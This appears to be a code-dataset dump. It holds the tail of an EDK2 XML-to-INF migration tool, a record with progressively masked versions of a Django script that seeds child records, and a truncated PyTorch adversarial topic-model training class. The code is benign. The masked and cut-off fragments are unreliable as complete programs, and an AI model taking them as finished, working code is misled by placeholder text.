ClonedRecordClass()\n\n XmlTag = \"Id\"\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n\n XmlTag = \"FarGuid\"\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/PackageGuid\"\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/PackageVersion\"\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/ModuleGuid\"\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n\n XmlTag = \"Cloned/ModuleVersion\"\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n\n return ClonedRecord\n\n\n## Load a new Guid/Protocol/Ppi common class object.\n#\n# Read an input XML Guid/Protocol/Ppi DOM object and return an object of\n# Guid/Protocol/Ppi contained in the DOM object.\n#\n# @param XmlGuidProtocolPpiCommon A child XML DOM object in a Common XML DOM.\n#\n# @retvel GuidProtocolPpiCommon A new GuidProtocolPpiCommon class object\n# created by XmlGuidProtocolPpiCommon.\n#\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n\n XmlTag = \"Name\"\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == \"Entry\":\n XmlTag = \"%s/C_Name\" % XmlParent\n elif XmlParent == \"GuidCNames\":\n XmlTag = \"%s/GuidCName\" % XmlParent\n else:\n XmlTag = \"%s/%sCName\" % (XmlParent, XmlParent)\n\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"GuidValue\"\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n\n if XmlParent.endswith(\"Notify\"):\n GuidProtocolPpiCommon.Notify = True\n\n XmlTag = \"GuidTypeList\"\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n\n XmlTag = \"SupModuleList\"\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n\n return GuidProtocolPpiCommon\n\n\n## Load a new Pcd class object.\n#\n# Read an input XML Pcd DOM object and return an object of Pcd\n# contained in the DOM object.\n#\n# @param XmlPcd A child XML DOM object in a Common XML DOM.\n#\n# @retvel Pcd A new Pcd object created by XmlPcd.\n#\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n\n XmlTag = \"PcdEntry/C_Name\"\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/Token\"\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/TokenSpaceGuidCName\"\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/DatumType\"\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/MaxDatumSize\"\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/DefaultValue\"\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n\n XmlTag = \"PcdItemType\"\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n\n XmlTag = \"PcdEntry/ValidUsage\"\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n\n XmlTag = \"SupModuleList\"\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n\n SetCommon(Pcd, XmlPcd)\n\n return Pcd\n\n\n## Load a new LibraryClass class object.\n#\n# Read an input XML LibraryClass DOM object and return an object of LibraryClass\n# contained in the DOM object.\n#\n# @param XmlLibraryClass A child XML DOM object in a Common XML DOM.\n#\n# @retvel LibraryClass A new LibraryClass object created by XmlLibraryClass.\n#\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n\n XmlTag = \"LibraryClass/Keyword\"\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == \"\":\n XmlTag = \"Name\"\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n\n XmlTag = \"LibraryClass/IncludeHeader\"\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n\n XmlTag = \"RecommendedInstanceVersion\"\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n\n XmlTag = \"RecommendedInstanceGuid\"\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n\n XmlTag = \"SupModuleList\"\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n\n SetCommon(LibraryClass, XmlLibraryClass)\n\n return LibraryClass\n\n\n## Load a new Build Option class object.\n#\n# Read an input XML BuildOption DOM object and return an object of Build Option\n# contained in the DOM object.\n#\n# @param XmlBuildOption A child XML DOM object in a Common XML DOM.\n#\n# @retvel BuildOption A new Build Option object created by XmlBuildOption.\n#\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass object equivalent to XmlBuildOption\"\"\"\n BuildOption = BuildOptionClass()\n\n BuildOption.Option = XmlElementData(XmlBuildOption)\n\n XmlTag = \"BuildTargets\"\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n\n XmlTag = \"ToolChainFamily\"\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n\n XmlTag = \"TagName\"\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n\n XmlTag = \"ToolCode\"\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n\n XmlTag = \"SupArchList\"\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n\n return BuildOption\n\n\n## Load a new User Extensions class object.\n#\n# Read an input XML UserExtensions DOM object and return an object of User\n# Extensions contained in the DOM object.\n#\n# @param XmlUserExtensions A child XML DOM object in a Common XML DOM.\n#\n# @retvel UserExtensions A new User Extensions object created by\n# XmlUserExtensions.\n#\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n\n XmlTag = \"UserID\"\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n\n XmlTag = \"Identifier\"\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n\n return UserExtensions\n\n\n## Store content to a text file object.\n#\n# Write some text file content to a text file object. The contents may echo\n# in screen in a verbose way.\n#\n# @param TextFile The text file object.\n# @param Content The string object to be written to a text file.\n#\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\n## Add item to a section.\n#\n# Add an Item with specific CPU architecture to section dictionary.\n# The possible duplication is ensured to be removed.\n#\n# @param Section Section dictionary indexed by CPU architecture.\n# @param Arch CPU architecture: Ia32, X64, Ipf, ARM, AARCH64, Ebc or Common.\n# @param Item The Item to be added to section dictionary.\n#\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\n## Get section contents.\n#\n# Return the content of section named SectionName.\n# the contents is based on Methods and ObjectLists.\n#\n# @param SectionName The name of the section.\n# @param Method A function returning a string item of an object.\n# @param ObjectList The list of object.\n#\n# @retval Section The string content of a section.\n#\ndef GetSection(SectionName, Method, ObjectList):\n SupportedArches = [\"common\", \"Ia32\", \"X64\", \"Ipf\", \"Ebc\", \"ARM\", \"AARCH64\"]\n SectionDict = {}\n for Object in ObjectList:\n Item = Method(Object)\n if Item == \"\":\n continue\n Item = \" %s\" % Item\n Arches = Object.SupArchList\n if len(Arches) == 0:\n AddToSection(SectionDict, \"common\", Item)\n else:\n for Arch in SupportedArches:\n if Arch.upper() in Arches:\n AddToSection(SectionDict, Arch, Item)\n\n Section = \"\"\n for Arch in SupportedArches:\n SectionArch = \"\\n\".join(SectionDict.get(Arch, []))\n if SectionArch != \"\":\n Section += \"[%s.%s]\\n%s\\n\" % (SectionName, Arch, SectionArch)\n Section += \"\\n\"\n if Section != \"\":\n Section += \"\\n\"\n return Section\n\n\n## Store file header to a text file.\n#\n# Write standard file header to a text file. The content includes copyright,\n# abstract, description and license extracted from CommonHeader class object.\n#\n# @param TextFile The text file object.\n# @param CommonHeader The source CommonHeader class object.\n#\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = CommonHeader.Abstract\n Description = CommonHeader.Description\n License = CommonHeader.License\n\n Header = \"#/** @file\\n#\\n\"\n Header += \"# \" + Abstract + \"\\n#\\n\"\n Header += \"# \" + Description.strip().replace(\"\\n\", \"\\n# \") + \"\\n\"\n Header += \"# \" + CopyRight + \"\\n#\\n\"\n Header += \"# \" + License.replace(\"\\n\", \"\\n# \").replace(\" \", \" \")\n Header += \"\\n#\\n#**/\\n\\n\"\n\n StoreTextFile(TextFile, Header)\n\n## Store file header to a text file.\n#\n# Write Defines section to a text file. DefinesTupleList determines the content.\n#\n# @param TextFile The text file object.\n# @param DefinesTupleList The list of (Tag, Value) to be added as one item.\n#\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = \"[Defines]\\n\"\n for DefineItem in DefinesTupleList:\n Section += \" %-30s = %s\\n\" % DefineItem\n\n Section += \"\\n\\n\"\n StoreTextFile(TextFile, Section)\n\n\n## Return one User Extension section.\n#\n# Read the input UserExtentsions class object and return one section.\n#\n# @param UserExtensions An input UserExtensions class object.\n#\n# @retval UserExtensionSection A section representing UserExtensions object.\n#\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n\n return \"[UserExtensions.%s.%s]\\n %s\\n\\n\" % (UserId, Identifier, Content)\n\n## Regular expression to match an equation.\nmReEquation = re.compile(r\"\\s*(\\S+)\\s*=\\s*(\\S*)\\s*\")\n\n## Return a value tuple matching information in a text fle.\n#\n# Parse the text file and return a value tuple corresponding to an input tag\n# tuple. In case of any error, an tuple of empty strings is returned.\n#\n# @param FileName The file name of the text file.\n# @param TagTuple A tuple of tags as the key to the value.\n#\n# @param ValueTupe The returned tuple corresponding to the tag tuple.\n#\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [\"\"] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split(\"#\", 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info(\"IO Error in reading file %s\" % FileName)\n\n return ValueTuple\n\n\n## Return a value tuple matching information in an XML fle.\n#\n# Parse the XML file and return a value tuple corresponding to an input tag\n# tuple. In case of any error, an tuple of empty strings is returned.\n#\n# @param FileName The file name of the XML file.\n# @param TagTuple A tuple of tags as the key to the value.\n#\n# @param ValueTupe The returned tuple corresponding to the tag tuple.\n#\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\n## Parse migration command line options\n#\n# Use standard Python module optparse to parse command line option of this tool.\n#\n# @param Source The source file type.\n# @param Destinate The destinate file type.\n#\n# @retval Options A optparse object containing the parsed options.\n# @retval InputFile Path of an source file to be migrated.\n#\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber = 1.0):\n # use clearer usage to override default usage message\n UsageString = \"%s [-a] [-v|-q] [-o <output_file>] <input_file>\" % ToolName\n Version = \"%s Version %.2f\" % (ToolName, VersionNumber)\n Copyright = \"Copyright (c) 2007, Intel Corporation. All rights reserved.\"\n\n Parser = OptionParser(description=Copyright, version=Version, usage=UsageString)\n Parser.add_option(\"-o\", \"--output\", dest=\"OutputFile\", help=\"The name of the %s file to be created.\" % Destinate)\n Parser.add_option(\"-a\", \"--auto\", dest=\"AutoWrite\", action=\"store_true\", default=False, help=\"Automatically create the %s file using the name of the %s file and replacing file extension\" % (Source, Destinate))\n Parser.add_option(\"-q\", \"--quiet\", action=\"store_true\", type=None, help=\"Disable all messages except FATAL ERRORS.\")\n Parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", type=None, help=\"Turn on verbose output with informational messages printed.\")\n\n Options, Args = Parser.parse_args()\n\n # Set logging level\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n\n # error check\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name=\"Input file\", usage=Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name=\"Too many input files\", usage=Parser.get_usage())\n\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1=\"-o\", arg2=\"-a\", usage=Parser.get_usage())\n else:\n if Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0] + \".\" + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name=\"-o\", usage=Parser.get_usage())\n\n return Options, InputFile\n\n# This acts like the main() function for the script, unless it is 'import'ed\n# into another script.\nif __name__ == '__main__':\n pass\n",
"step-ids": [
11,
18,
20,
21,
23
]
}
|
[
11,
18,
20,
21,
23
] |
""" Python Package Support """
# Not applicable
""" Django Package Support """
# Not applicable
""" Internal Package Support """
from Data_Base.models import School, Person, Child
"""
Data_Base/Data/Imports/child_import.py
Author: Matthew J Swann;
Yong Kin;
Bradon Atkins; and
Adam Carter
Version: 1.0
Last Update: 2013-04-07
Update By: Matthew J Swann
Importing data to the person table.
"""
class ChildImport(object):
def __init__(self, scriptName=None):
# 1
x = Child.objects.create(
first_name = 'Timmy',
last_name = 'Thompson',
school = School.objects.get(pk=1),
)
x.family.add(Person.objects.get(pk=1))
x.family.add(Person.objects.get(pk=2))
x.save()
# 2
x = Child.objects.create(
first_name = 'Jimmy',
last_name = 'Johnson',
school = School.objects.get(pk=2),
)
x.family.add(Person.objects.get(pk=2))
x.family.add(Person.objects.get(pk=1))
x.save()
# 3
x = Child.objects.create(
first_name = 'Bart',
last_name = 'Simpson',
school = School.objects.get(pk=3),
)
x.family.add(Person.objects.get(pk=3))
x.family.add(Person.objects.get(pk=4))
x.save()
# 4
x = Child.objects.create(
first_name = 'Lisa',
last_name = 'Simpson',
school = School.objects.get(pk=4),
)
x.family.add(Person.objects.get(pk=4))
x.family.add(Person.objects.get(pk=3))
x.save()
# 5
x = Child.objects.create(
first_name = 'Andrew',
last_name = 'Becker',
school = School.objects.get(pk=5),
)
x.family.add(Person.objects.get(pk=5))
x.family.add(Person.objects.get(pk=6))
x.save()
# 6
x = Child.objects.create(
first_name = 'Jasmine',
last_name = 'Goulette',
school = School.objects.get(pk=6),
)
x.family.add(Person.objects.get(pk=6))
x.family.add(Person.objects.get(pk=5))
x.save()
# 7
x = Child.objects.create(
first_name = 'Kristina',
last_name = 'Murry',
school = School.objects.get(pk=7),
)
x.family.add(Person.objects.get(pk=7))
x.family.add(Person.objects.get(pk=8))
x.save()
# 8
x = Child.objects.create(
first_name = 'Andrew',
last_name = 'Scheonster',
school = School.objects.get(pk=8),
)
x.family.add(Person.objects.get(pk=8))
x.family.add(Person.objects.get(pk=7))
x.save()
|
normal
|
{
"blob_id": "d0287b057530883a50ad9c1e5e74dce10cd825b6",
"index": 7961,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ChildImport(object):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ChildImport(object):\n\n def __init__(self, scriptName=None):\n x = Child.objects.create(first_name='Timmy', last_name='Thompson',\n school=School.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=2))\n x.save()\n x = Child.objects.create(first_name='Jimmy', last_name='Johnson',\n school=School.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=1))\n x.save()\n x = Child.objects.create(first_name='Bart', last_name='Simpson',\n school=School.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=4))\n x.save()\n x = Child.objects.create(first_name='Lisa', last_name='Simpson',\n school=School.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=3))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name='Becker',\n school=School.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=6))\n x.save()\n x = Child.objects.create(first_name='Jasmine', last_name='Goulette',\n school=School.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=5))\n x.save()\n x = Child.objects.create(first_name='Kristina', last_name='Murry',\n school=School.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=8))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name=\n 'Scheonster', school=School.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=7))\n x.save()\n",
"step-4": "<mask token>\nfrom Data_Base.models import School, Person, Child\n<mask token>\n\n\nclass ChildImport(object):\n\n def __init__(self, scriptName=None):\n x = Child.objects.create(first_name='Timmy', last_name='Thompson',\n school=School.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=2))\n x.save()\n x = Child.objects.create(first_name='Jimmy', last_name='Johnson',\n school=School.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=1))\n x.save()\n x = Child.objects.create(first_name='Bart', last_name='Simpson',\n school=School.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=4))\n x.save()\n x = Child.objects.create(first_name='Lisa', last_name='Simpson',\n school=School.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=3))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name='Becker',\n school=School.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=6))\n x.save()\n x = Child.objects.create(first_name='Jasmine', last_name='Goulette',\n school=School.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=5))\n x.save()\n x = Child.objects.create(first_name='Kristina', last_name='Murry',\n school=School.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=8))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name=\n 'Scheonster', school=School.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=7))\n x.save()\n",
"step-5": "\"\"\" Python Package Support \"\"\"\n# Not applicable\n\n\"\"\" Django Package Support \"\"\"\n# Not applicable\n\n\"\"\" Internal Package Support \"\"\"\nfrom Data_Base.models import School, Person, Child\n\n\"\"\"\n Data_Base/Data/Imports/child_import.py\n \n Author: Matthew J Swann; \n Yong Kin; \n Bradon Atkins; and \n Adam Carter\n \n Version: 1.0\n Last Update: 2013-04-07\n Update By: Matthew J Swann\n \n Importing data to the person table.\n\n \"\"\"\n \nclass ChildImport(object):\n \n def __init__(self, scriptName=None):\n \n # 1\n x = Child.objects.create(\n first_name = 'Timmy',\n last_name = 'Thompson',\n school = School.objects.get(pk=1), \n )\n x.family.add(Person.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=2))\n x.save()\n\n # 2\n x = Child.objects.create(\n first_name = 'Jimmy',\n last_name = 'Johnson',\n school = School.objects.get(pk=2), \n )\n x.family.add(Person.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=1))\n x.save()\n \n # 3\n x = Child.objects.create(\n first_name = 'Bart',\n last_name = 'Simpson',\n school = School.objects.get(pk=3), \n )\n x.family.add(Person.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=4))\n x.save()\n \n # 4\n x = Child.objects.create(\n first_name = 'Lisa',\n last_name = 'Simpson',\n school = School.objects.get(pk=4), \n )\n x.family.add(Person.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=3))\n x.save()\n \n # 5\n x = Child.objects.create(\n first_name = 'Andrew',\n last_name = 'Becker',\n school = School.objects.get(pk=5), \n )\n x.family.add(Person.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=6))\n x.save()\n \n # 6\n x = Child.objects.create(\n first_name = 'Jasmine',\n last_name = 'Goulette',\n school = School.objects.get(pk=6), \n )\n x.family.add(Person.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=5))\n x.save()\n \n # 7\n x = Child.objects.create(\n first_name = 'Kristina',\n last_name = 'Murry',\n school = School.objects.get(pk=7), \n )\n x.family.add(Person.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=8))\n x.save()\n\n # 8\n x = Child.objects.create(\n first_name = 'Andrew',\n last_name = 'Scheonster',\n school = School.objects.get(pk=8), \n )\n x.family.add(Person.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=7))\n x.save()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MultinomialAdversarialNetwork(TopicModel):
<|reserved_special_token_0|>
def prepare_data(self, d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
train = data_utils.TensorDataset(features, target)
train_loaders[domain] = DataLoader(train, opt.batch_size,
shuffle=True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
uset = data_utils.TensorDataset(features, target)
unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
shuffle=True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self
.prepare_data(d))
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.
F_hidden_sizes, opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],
opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +
opt.domain_hidden_size, opt.shared_hidden_size + opt.
domain_hidden_size, 2, opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt
.shared_hidden_size, len(opt.all_domains), opt.loss, opt.
dropout, opt.D_bn)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.
device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.
parameters() if self.F_s else [], self.C.parameters()] + [f.
parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
correct, total = defaultdict(int), defaultdict(int)
d_correct, d_total = 0, 0
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred == tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred == d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss,
len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs['display_step'] == 0:
print('Epoch:', '%04d, done' % (epoch + 1))
return loss_d_res, l_d_res, l_c_res
<|reserved_special_token_0|>
def get_name(self):
if self._name is None:
self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
return self._name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultinomialAdversarialNetwork(TopicModel):
def __init__(self, k, m, model_params=None, log_params=None):
super().__init__(k, m, model_params, log_params)
def prepare_data(self, d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
train = data_utils.TensorDataset(features, target)
train_loaders[domain] = DataLoader(train, opt.batch_size,
shuffle=True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
uset = data_utils.TensorDataset(features, target)
unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
shuffle=True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self
.prepare_data(d))
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.
F_hidden_sizes, opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],
opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +
opt.domain_hidden_size, opt.shared_hidden_size + opt.
domain_hidden_size, 2, opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt
.shared_hidden_size, len(opt.all_domains), opt.loss, opt.
dropout, opt.D_bn)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.
device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.
parameters() if self.F_s else [], self.C.parameters()] + [f.
parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
